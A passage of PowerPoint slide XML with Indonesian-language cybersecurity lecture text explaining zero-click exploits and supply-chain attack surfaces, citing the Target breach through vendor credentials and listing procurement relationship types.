              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> zero-click. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dibuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Zero-click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lampiran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>gambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4270107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Permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pasokan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ujung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ujung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembobolan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data Target, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh vendor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perdagangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (B2B).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Vendor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
